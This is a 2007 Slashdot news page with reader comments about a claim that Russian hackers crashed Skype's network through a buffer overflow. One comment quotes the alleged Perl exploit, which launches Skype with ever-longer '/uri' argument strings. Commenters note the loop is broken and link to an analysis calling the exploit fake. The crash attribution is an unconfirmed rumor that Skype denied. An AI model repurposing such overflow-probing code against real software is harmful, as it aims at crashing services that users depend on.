Did Russian Hackers Crash Skype?

← Back to Stories (view on slashdot.org)

Did Russian Hackers Crash Skype?

Posted by kdawson on Saturday August 18, 2007 @11:59AM from the flicking-a-domino dept.

An anonymous reader sends us to the www.xakep.ru forum where a poster claims that the worldwide Skype crash was caused by Russian hackers (in Russian). The claim is that they found a local buffer overflow vulnerability caused by sending a long string to the Skype authorization server. You can try Google's beta Russian-to-English translation, but the interesting part is the exploit code, and that's more readable in the original. The Washington Post reports that Skype has denied this rumor.

8 of 108 comments (clear)

Min score:

Reason:

Sort:

The code snippet seems to be wrong by ghost4096 · 2007-08-18 12:06 · Score: 4, Informative

The loop body will never execute....
1. Re:The code snippet seems to be wrong by eggnoglatte · 2007-08-18 12:37 · Score: 4, Informative
  
  Hex constants in Perl, like C/C++ have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.
2. Re:The code snippet seems to be wrong by ThePhilips · 2007-08-18 19:57 · Score: 4, Informative
  
  Well, this is very very very old Russian hacker tradition: introduce flaw in the crack/exploit to prevent it from being (ab)used by idiots.
  
  --
  All hope abandon ye who enter here.
3. Re:The code snippet seems to be wrong by eneville · 2007-08-18 21:56 · Score: 4, Informative
  
  Hex constants in Perl, like C/C++ have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.
  no, octal numbers start with 0. hex numbers start with x. typo: no, octal numbers start with 0. hex numbers start with 0x.
  
  --
  Why UNIX?
Translation by ACS+Solver · 2007-08-18 12:14 · Score: 5, Informative

Here's the article's introductory part properly translated.

"The reason for yesterday's downtime of the Skype network is research of Russian crackers, as reported by one of our readers.

While searching for a local buffer overflow, a possibility was found to send a long string to the server, overflowing its buffer and causing the server to go down. Its place is taken by another server from the P2P network, the error arises on it in the same way, and so on. As a result, the entire Skype network refused service for several hours and the developer team was forced to turn off authentication.

Here's the exploit code:"
1. Re:Translation by mobby_6kl · 2007-08-18 12:38 · Score: 4, Informative
  
  You've got to be kidding, I was about to submit my own translation! :)
  
  Anyway, your version is probably a little better, so I'll contribute with something else. The script is very short too, so here it is:
  #!/usr/bin/perl # Simle Code by Maranax Porex ;D # Ya Skaypeg!! for ($i=256; $i>xCCCCC; $i=$i+256) { $eot='AAAA' x $i; call_sp(); } exit; sub call_sp() { $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; system("$str"); }
  The first page of comments seems to be just the usual bunch of trolls, assholes, and simply useless posts, except for one that claims the code has been shown not to do anything on a dedicated security site. The Skype article on the front page doesn't contain any additional information. The attack looks almost too simple to work, but I wasn't able to find any strong evidence that would suggest that it doesn't, at least not with a few quick searches.
fake? by arghblubber · 2007-08-18 12:33 · Score: 5, Informative

http://www.ush.it/2007/08/18/why-the-skype-0day-ex ploit-is-a-fake/
coincidence? by TheSHAD0W · 2007-08-18 12:44 · Score: 5, Informative

I bet people are trying exploits against Skype (and other popular servers and services) all the time. If someone tries something funny, and the system crashes a few seconds afterwards, they may assume they were the cause.